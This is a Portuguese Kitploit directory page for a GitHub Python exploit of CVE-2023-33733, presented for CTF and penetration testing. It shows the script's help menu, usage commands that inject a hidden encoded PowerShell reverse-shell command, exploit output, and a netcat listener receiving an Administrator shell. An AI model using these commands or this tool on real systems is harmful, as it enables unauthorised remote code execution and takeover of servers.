Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-33733-Exploit-PoC — Script de exploit Python para CVE-2023-33733 visando aplicações web. Automatiza autenticação, extração de sessão e entrega de reverse shell para testes de penetração e ambientes CTF. | Kitploit
Ferramentas/GitHubGitHub/l41kaa/cve-2023-33733-exploit-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de Penetração
GitHubl41kaa/cve-2023-33733-exploit-poc

CVE-2023-33733-Exploit-PoC

Script de exploit Python para CVE-2023-33733 visando aplicações web. Automatiza autenticação, extração de sessão e entrega de reverse shell para testes de penetração e ambientes CTF.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
314há 2 anosAinda não revisado
Compartilhar

CVE-2023-33733-POC

Aviso Legal

Eu não encontrei esta vulnerabilidade, nem assumo crédito por ela. Este é simplesmente um script que criei para explorar esta vulnerabilidade mais facilmente em um CTF. Para as informações originais, consulte: https://github.com/c53elyas/CVE-2023-33733

Este script destina-se simplesmente a ser um script Python3 rápido para explorar a CVE-2023-33733. Você precisará fornecer o host, a porta, o comando e um cookie de sessão válido.

Menu de Ajuda

root@kitploit:~
kali@kali:~/Desktop$ python3 exp.py --help 
usage: foothold.py [-h] --host HOST --port PORT --cmd CMD --session SESSION

options:
  -h, --help            show this help message and exit
  --host HOST
  --port PORT, -p PORT
  --cmd CMD, -c CMD
  --username USERNAME, -u USERNAME
  --password PASSWORD, -ps PASSWORD
  --session SESSION, --cookie SESSION, -sc SESSION
                        Session cookie

Uso

root@kitploit:~
kali@kali:~/Desktop$ python3 exp.py --host "vuln.server" --port 80 --cmd "powershell -nop -w hidden -e <your revshell code here>" --username "<your username here>" --password "<your password here>"
[*] Logging in to http://vuln.server:80
Retreived session cookie: SESSION=...
[*] Extracting session token...
[*] Token extracted:  .abc.xyz
[*] Building Exploit...
[*] Exploit built
[*] Preparing request
[*] Sending request to http://vuln.server:80/leaveRequest
[*] Sending a reverse shell should cause request to hang
[*] Request sent
[*] Probable success. Status Code 504


kali@kali:~/Desktop$ python3 exp.py --host "vuln.server" --port 80 --cmd "powershell -nop -w hidden -e <your revshell code here>" --session "<your cookie here>"
[*] Building Exploit...
[*] Exploit built
[*] Preparing request
[*] Sending request to http://vuln.server:80/leaveRequest
[*] Sending a reverse shell should cause request to hang
[*] Request sent
[*] Probable success. Status Code 500


# Listener
kali@kali:~/Desktop$ nc -lnvp 9001
connect to [10.10.10.2] from (UNKNOWN) [10.10.10.1] 50246
whoami
Administrator
Baixar ferramenta